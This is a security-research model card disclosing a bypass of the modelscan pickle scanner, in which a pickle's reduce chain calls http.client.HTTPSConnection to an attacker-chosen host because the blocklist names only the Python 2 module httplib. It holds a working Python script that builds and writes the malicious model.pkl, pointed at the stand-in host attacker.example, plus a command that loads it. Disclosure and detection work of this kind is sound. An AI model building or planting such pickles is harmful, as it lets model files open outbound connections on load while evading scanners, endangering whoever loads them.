---
license: mit
tags:
  - security-research
  - modelscan-bypass
---

modelscan-bypass-http-client-ssrf

Impact

HIGH - SSRF: deserializing the pickle makes the loading host open an outbound HTTPS connection to an attacker-chosen server, with no finding reported by modelscan beforehand.

Technique

The pickle's reduce chain calls http.client.HTTPSConnection(...). modelscan's unsafe-globals blocklist names the Python 2 module httplib but not its Python 3 successor http.client, so the import is not matched. Anything http.client uses underneath never shows up either: a pickle's opcode stream records only the globals it references directly, not their transitive imports, so a blocklist scanner sees nothing but http.client.

Verification

# Scan with modelscan; the bypass is confirmed if the report shows "No issues found"
modelscan scan -p model.pkl

# Load the pickle to confirm the behaviour. Do this only in an isolated sandbox
# with egress monitored: loading executes the payload, and the outbound HTTPS
# connection to the attacker-chosen host is the finding.
python3 -c "import pickle; pickle.loads(open('model.pkl','rb').read())"
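The Technique and Verification sections above describe the payload and the two commands used to check it. The following is an added example, not part of this model card and not modelscan's code, that builds the same kind of pickle and walks its opcode stream with pickletools without ever calling pickle.loads. The host name `attacker.example`, the class `HttpClientPayload`, the functions `build_payload`, `referenced_globals` and `flagged_imports`, and the two blocklists `LEGACY_NAME_BLOCKLIST` and `UPDATED_BLOCKLIST` are all constructed for illustration; the blocklists stand in for the page's description of modelscan v0.7.6 and do not reproduce its settings. The example also goes one step beyond the page: Python's own pickler rewrites `http.client` to the Python 2 alias `httplib` when writing protocols 0 to 2 with the default `fix_imports=True`, so the bypass applies only to pickles written with protocol 3 or later (or with `fix_imports=False`).

```python
import http.client
import pickle
import pickletools
from typing import Dict, List, Set, Tuple

# Constructed host for the example. Nothing is contacted: the payload is only
# built and inspected here, never passed to pickle.loads.
TARGET_HOST = "attacker.example"

_MARK = object()  # sentinel standing in for pickle's MARK on the simulated stack

# Illustrative blocklists standing in for the page's description of modelscan
# v0.7.6 (Python 2 name listed, Python 3 name missing); not modelscan's settings.
LEGACY_NAME_BLOCKLIST: Set[str] = {"httplib"}
UPDATED_BLOCKLIST: Set[str] = {"httplib", "http.client"}

_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
               "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


class HttpClientPayload:
    """Pickles to a reduce chain calling http.client.HTTPSConnection(TARGET_HOST).

    The opcode stream names only the global it imports directly; the socket
    module that http.client uses underneath never appears in it.
    """

    def __reduce__(self):
        return (http.client.HTTPSConnection, (TARGET_HOST,))


def build_payload(protocol: int = 4, fix_imports: bool = True) -> bytes:
    """With protocol < 3 and fix_imports=True the pickler rewrites the module
    name to its Python 2 alias 'httplib'; the bypass needs protocol 3+."""
    return pickle.dumps(HttpClientPayload(), protocol=protocol, fix_imports=fix_imports)


def referenced_globals(data: bytes) -> List[Tuple[str, str]]:
    """Every (module, name) the pickle imports, found without executing it.

    GLOBAL carries the pair inline; STACK_GLOBAL pops name then module off the
    stack, so a small stack/memo simulation driven by pickletools' declared
    stack effects keeps those two strings where the opcode expects them.
    """
    found: List[Tuple[str, str]] = []
    stack: List[object] = []
    memo: Dict[int, object] = {}
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
            stack.append(None)
        elif op.name == "STACK_GLOBAL":
            name = stack.pop() if stack else None
            module = stack.pop() if stack else None
            if isinstance(module, str) and isinstance(name, str):
                found.append((module, name))
            stack.append(None)
        elif op.name in _STRING_OPS:
            stack.append(arg)
        elif op.name == "MARK":
            stack.append(_MARK)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = stack[-1] if stack else None
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = stack[-1] if stack else None
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            stack.append(memo.get(arg))
        else:
            # Generic bookkeeping from the opcode's declared stack effect.
            before = [s.name for s in op.stack_before]
            if "markobject" in before:
                while stack and stack[-1] is not _MARK:
                    stack.pop()
                if stack:
                    stack.pop()  # the MARK itself
                for _ in range(before.index("markobject")):
                    if stack:
                        stack.pop()  # operands declared below the mark
            else:
                for _ in before:
                    if stack:
                        stack.pop()
            stack.extend([None] * len(op.stack_after))
    return found


def flagged_imports(data: bytes, blocklist: Set[str]) -> List[Tuple[str, str]]:
    """Imports whose module is on the blocklist (exact module-name match)."""
    return [(m, n) for m, n in referenced_globals(data) if m in blocklist]


if __name__ == "__main__":
    payload = build_payload()
    with open("model.pkl", "wb") as fh:
        fh.write(payload)  # input for the modelscan / pickle.loads steps above
    print("imports:", referenced_globals(payload))
    print("legacy blocklist flags: ", flagged_imports(payload, LEGACY_NAME_BLOCKLIST))
    print("updated blocklist flags:", flagged_imports(payload, UPDATED_BLOCKLIST))
    print("protocol 2 imports:", referenced_globals(build_payload(protocol=2)))
```

Running the script writes model.pkl for the two Verification commands and prints the imports the static walk recovers. The protocol-2 line shows the module recorded as `httplib`, which a list containing only the legacy name does match; the protocol-4 default records `http.client` and slips past it. Matching on exact module names is what makes the gap possible, which is the practical argument for matching a blocklisted module by prefix (`http.` or `http.client`) rather than by a single spelling.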

Details

Modelscan bypass via http.client (SSRF). Tested against modelscan v0.7.6, the latest PyPI release at the time of testing.